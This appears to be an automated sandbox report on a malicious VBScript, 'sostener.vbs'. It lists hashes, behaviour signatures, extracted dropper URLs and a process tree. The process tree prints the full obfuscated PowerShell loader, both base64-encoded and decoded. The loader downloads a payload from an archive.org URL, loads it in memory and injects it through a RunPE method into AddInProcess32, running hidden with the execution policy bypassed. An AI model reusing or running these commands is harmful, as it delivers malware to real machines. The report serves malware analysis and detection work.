Overview

overview

10

Static

static

1

sostener.vbs

windows7-x64

10

sostener.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2024 08:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sostener.vbs

  • Size

    499KB

  • MD5

    3b4164bdb4cf6c49570c95714f8c17a5

  • SHA1

    13c7abef0333088056a8c11c951c97fcb878ad96

  • SHA256

    fac857a7fa291be79831caef11498e067c036cd66812c7f1244b95b3e78a3ea4

  • SHA512

    460bf20b6d30b4314703b67356828e540db80b43e3afc37ce2d075660370a4a306659075abe4a6895039df86316d95756441e40546d8d72daef7c5c11e7155ac

  • SSDEEP

    12288:n9D/msDMDwwpZcKHg9NR4A6sgmkhf1dM4Y6ebu5Z2PqoKuN8HUe5FXNbSEKOsyTE:Sbqj

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1008

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    f029d9c92bce26181fea3cc69e176de4

    SHA1

    c09559aef3e79ab55b4a80e0e71f89ffa6eed249

    SHA256

    a9a9ffc19dd5091a881f39cbb3ae7d59b7bd7e2243e3bf17cf5fe46569b9632a

    SHA512

    4421c78cb6baa3f18437d3f19db445dcbc0898a697ce866f32b00ab59f1f875552507649fb39bcd52838f65d351ebd9465f828745c4788a20f9c3818cfc40d72

    Download Submit

  • memory/1688-4-0x000007FEF611E000-0x000007FEF611F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1688-5-0x000000001B570000-0x000000001B852000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1688-7-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1688-8-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-9-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-10-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-16-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

    Download